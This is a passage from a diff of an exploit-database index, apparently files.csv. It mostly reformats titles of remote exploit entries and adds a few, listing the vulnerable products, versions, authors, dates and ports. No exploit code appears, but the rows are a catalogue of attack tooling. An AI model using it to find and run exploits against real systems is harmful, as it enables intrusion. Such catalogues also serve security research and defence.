Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0 +3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0 3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote,0 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow",2007-04-15,rgod,windows,remote,80 @@ -9531,7 +9532,7 @@ id,file,description,date,author,platform,type,port 4287,platforms/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0 -4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0 +4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 @@ -9553,7 +9554,7 @@ id,file,description,date,author,platform,type,port 4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' SaveToFile() Insecure Method",2007-09-10,shinnai,windows,remote,0 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0 4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 -4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 +4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - 'PDWizard.ocx' Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - 'VBTOVSI.dll 1.0.0.0' File Overwrite",2007-09-11,shinnai,windows,remote,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow",2007-09-12,96sysim,windows,remote,0 4399,platforms/multiple/remote/4399.html,"Apple QuickTime (Multiple Browsers) - Command Execution (PoC)",2007-09-12,pdp,multiple,remote,0 @@ -9650,7 +9651,7 @@ id,file,description,date,author,platform,type,port 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 -5025,platforms/windows/remote/5025.html,"MySpace Uploader - (MySpaceUploader.ocx 1.0.0.4) Buffer Overflow",2008-01-31,Elazar,windows,remote,0 +5025,platforms/windows/remote/5025.html,"MySpace Uploader - 'MySpaceUploader.ocx 1.0.0.4' Buffer Overflow",2008-01-31,Elazar,windows,remote,0 5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' ActiveX Buffer Overflow",2008-02-03,plan-s,windows,remote,0 5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1)",2008-02-03,anonymous,windows,remote,0 @@ -9666,7 +9667,7 @@ id,file,description,date,author,platform,type,port 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,windows,remote,0 -5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 'Firmware 1.0.4.800' - Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 +5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 Firmware 1.0.4.800 - Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote,0 5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow",2008-02-19,luoluo,windows,remote,0 5188,platforms/windows/remote/5188.html,"Rising AntiVirus Online Scanner - Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 @@ -9689,7 +9690,7 @@ id,file,description,date,author,platform,type,port 5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution",2008-03-20,kingcope,solaris,remote,0 5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",hardware,remote,0 -5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 +5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69 5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80 @@ -9730,12 +9731,12 @@ id,file,description,date,author,platform,type,port 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0 5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0 -5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0 +5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0 5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)",2008-06-13,securfrog,windows,remote,0 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000 -5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 +5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 6012,platforms/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 @@ -9749,7 +9750,7 @@ id,file,description,date,author,platform,type,port 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 -6124,platforms/windows/remote/6124.c,"Microsoft Access - (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 +6124,platforms/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 6151,platforms/windows/remote/6151.txt,"velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 @@ -9887,8 +9888,8 @@ id,file,description,date,author,platform,type,port 7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite",2009-01-30,DSecRG,windows,remote,0 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection (PoC)",2009-01-30,waraxe,windows,remote,0 7966,platforms/windows/remote/7966.txt,"navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure",2009-02-03,e.wiZz!,windows,remote,0 -7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows XP)",2009-02-04,"Rob Carter",windows,remote,0 -7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows Vista)",2009-02-04,"Rob Carter",windows,remote,0 +7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 (Windows XP) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",windows,remote,0 +7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 (Windows Vista) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",windows,remote,0 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0 8023,platforms/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code Execution",2009-02-09,ikki,hardware,remote,0 8037,platforms/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,multiple,remote,0 @@ -9942,8 +9943,8 @@ id,file,description,date,author,platform,type,port 8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-Server - Directory Traversal",2009-04-10,DSecRG,windows,remote,0 8398,platforms/windows/remote/8398.php,"FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 8419,platforms/windows/remote/8419.pl,"FTPDMIN 0.96 - Arbitrary File Disclosure",2009-04-13,Stack,windows,remote,21 -8421,platforms/windows/remote/8421.py,"Steamcast - (HTTP Request) Remote Buffer Overflow (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 -8422,platforms/windows/remote/8422.py,"Steamcast - (HTTP Request) Remote Buffer Overflow (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 +8421,platforms/windows/remote/8421.py,"Steamcast - HTTP Request Remote Buffer Overflow (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 +8422,platforms/windows/remote/8422.py,"Steamcast - HTTP Request Remote Buffer Overflow (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - WebServer Directory Traversal",2009-04-14,e.wiZz!,windows,remote,0 8458,platforms/multiple/remote/8458.txt,"Apache Geronimo 2.1.3 - Multiple Directory Traversal Vulnerabilities",2009-04-16,DSecRG,multiple,remote,0 8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0 @@ -9959,10 +9960,10 @@ id,file,description,date,author,platform,type,port 8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution",2009-04-29,Arr1val,linux,remote,0 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution",2009-04-29,Arr1val,linux,remote,0 8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow",2009-04-30,MITBOY,windows,remote,0 -8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - (CWD Response) Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 +8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 -8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - (CWD Response) Universal Overwrite (SEH)",2009-05-05,His0k4,windows,remote,0 -8623,platforms/windows/remote/8623.rb,"32bit FTP - (PASV) Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,windows,remote,0 +8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,windows,remote,0 +8623,platforms/windows/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,windows,remote,0 8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote,0 8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8696,platforms/hardware/remote/8696.txt,"Multiple D-Link Products - Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0 @@ -9982,14 +9983,14 @@ id,file,description,date,author,platform,type,port 8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - 'SonicMediaPlayer.dll' Remote Buffer Overflow",2009-05-29,snakespc,windows,remote,0 8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow (heap spray)",2009-06-01,His0k4,windows,remote,0 8846,platforms/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,hardware,remote,0 -8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - (ITMS) Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 +8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 8880,platforms/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote,0 8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8907,platforms/multiple/remote/8907.txt,"Apple Safari 3.2.x - (XXE attack) Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - (Control Server) Remote Buffer Overflow",2009-06-09,His0k4,windows,remote,80 8922,platforms/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0 8930,platforms/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote,0 -8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - (itms/itcp) Remote Buffer Overflow",2009-06-12,ryujin,windows,remote,0 +8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,windows,remote,0 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - (URL) Remote Buffer Overflow",2009-06-12,seer[N.N.U],windows,remote,0 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,windows,remote,0 @@ -10166,7 +10167,7 @@ id,file,description,date,author,platform,type,port 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0 10282,platforms/linux/remote/10282.py,"OrzHTTPd - Format String",2009-12-03,"Patroklos Argyroudis",linux,remote,80 10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 -10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - (user.ini) Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 +10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,remote,0 10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,windows,remote,0 10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 @@ -10283,7 +10284,7 @@ id,file,description,date,author,platform,type,port 12865,platforms/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 -13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - (PoC)",2010-06-09,Unknown,multiple,remote,0 +13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Live Malware (PoC)",2010-06-09,Unknown,multiple,remote,0 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)",2010-06-10,"Tavis Ormandy",windows,remote,0 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,windows,remote,0 13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0 @@ -10778,7 +10779,7 @@ id,file,description,date,author,platform,type,port 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave Player - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)",2010-10-04,Metasploit,windows,remote,0 -16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - (VML) Fill Method Code Execution (MS06-055) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16598,platforms/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)",2010-07-12,Metasploit,windows,remote,0 16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0 @@ -10787,7 +10788,7 @@ id,file,description,date,author,platform,type,port 16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16604,platforms/windows/remote/16604.rb,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16607,platforms/windows/remote/16607.rb,"WinZip FileView - (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16607,platforms/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -10827,7 +10828,7 @@ id,file,description,date,author,platform,type,port 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0 16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21 -16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0 +16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0 16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100 16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0 @@ -11254,7 +11255,7 @@ id,file,description,date,author,platform,type,port 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0 -18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0 +18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - 'vncviewer.exe' Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0 18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 @@ -14111,7 +14112,7 @@ id,file,description,date,author,platform,type,port 32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 - '.WAV' File Parsing Code Execution",2008-12-29,anonymous,windows,remote,0 32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 - CDATA HTML Injection",2008-12-29,system_meltdown,multiple,remote,0 32690,platforms/linux/remote/32690.txt,"xterm - DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",linux,remote,0 -32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote,0 +32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - libaudiofile 'msadpcm.c' .WAV File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote,0 32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products - Unspecified Remote Command Execution",2009-01-07,"Michel Arboi",windows,remote,0 32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0 @@ -14156,7 +14157,7 @@ id,file,description,date,author,platform,type,port 32923,platforms/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow",2009-04-16,e.wiZz!,windows,remote,0 32925,platforms/multiple/remote/32925.txt,"NRPE 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote,0 32929,platforms/linux/remote/32929.txt,"RedHat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",linux,remote,0 -32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 - (Firmware) 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",hardware,remote,0 +32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 Firmware - 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",hardware,remote,0 32938,platforms/hardware/remote/32938.c,"Sercomm TCP/32674 - Backdoor Reactivation",2014-04-18,Synacktiv,hardware,remote,32674 32942,platforms/linux/remote/32942.txt,"Mozilla - Multiple Products Server Refresh Header Cross-Site Scripting",2009-04-22,"Olli Pettay",linux,remote,0 32944,platforms/multiple/remote/32944.txt,"SAP cFolders - Cross-Site Scripting / HTML Injection",2009-04-21,"Digital Security Research Group",multiple,remote,0 @@ -15228,6 +15229,8 @@ id,file,description,date,author,platform,type,port 41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0 41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80 41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80 +41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Arbitrary Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0 